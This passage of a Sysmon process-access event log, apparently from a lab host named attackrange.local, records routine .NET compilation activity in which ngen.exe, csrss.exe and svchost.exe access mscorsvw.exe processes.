C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.434","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-001087100C00}","TargetProcessId":"2544","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7696,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.434\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-001087100C00}\r\nTargetProcessId: 2544\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.434","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-001087100C00}","TargetProcessId":"2544","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7697,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.434\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-001087100C00}\r\nTargetProcessId: 2544\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.434","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-001087100C00}","TargetProcessId":"2544","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7698,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.481\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-0010B9140C00}\r\nTargetProcessId: 3056\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.481","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-0010B9140C00}","TargetProcessId":"3056","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7699,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.481\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-0010B9140C00}\r\nTargetProcessId: 3056\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.481","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-0010B9140C00}","TargetProcessId":"3056","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7700,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.481\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-0010B9140C00}\r\nTargetProcessId: 3056\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.481","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-0010B9140C00}","TargetProcessId":"3056","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7701,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.528\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-00101F110B00}\r\nTargetProcessId: 2980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.528","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-00101F110B00}","TargetProcessId":"2980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7702,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.528\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-00101F110B00}\r\nTargetProcessId: 2980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.528","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-00101F110B00}","TargetProcessId":"2980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
